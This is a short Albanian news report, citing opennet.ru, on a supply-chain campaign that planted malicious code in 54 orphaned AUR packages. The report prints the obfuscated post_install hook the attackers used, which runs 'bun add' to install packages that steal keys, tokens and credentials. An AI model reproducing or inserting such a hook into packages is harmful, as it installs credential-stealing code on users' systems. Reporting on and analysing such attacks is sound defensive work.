Sido që masat e ndërmarra nga zhvilluesit e Arch Linux, aktiviteti i futjes së kodit të dëmshëm në repositorin AUR (Arch User Repository) nuk është ndalur. Disa orë më parë, kodi i dëmshëm u fut në 54 paketa të tjera, që mbetën pa kujdestarë (historiku i anulimeve të të dhënave të dëmshme). Ndryshe nga sulmet e djeshme, kësaj here është përdorur platforma bun për të instaluar varësitë e dëmshme në vend të menaxherit të paketave npm. Për të anashkaluar filtrat e realizuar, një varg i obfuskatuar është futur në funksionin post_install, i cili thërret komandën "bun add" për të instaluar paketat me kod të dëmshëm, që skanojnë dhe dërgojnë të dhëna në të jashtme. server çelësave, tokenëve dhe kredencialeve.
post_install() {
$â\x63âČ»d» «/»ât'»m»âpâ && «b»âu»nâ âa'»d»âdâ $â\141\x6e»s'»i»»-«$â\143»o»l»o»râ$â\x73âČ ân'»e»âx'»t»»f»âi»l»e»-»j»sâ
}
Burimi: opennet.ru
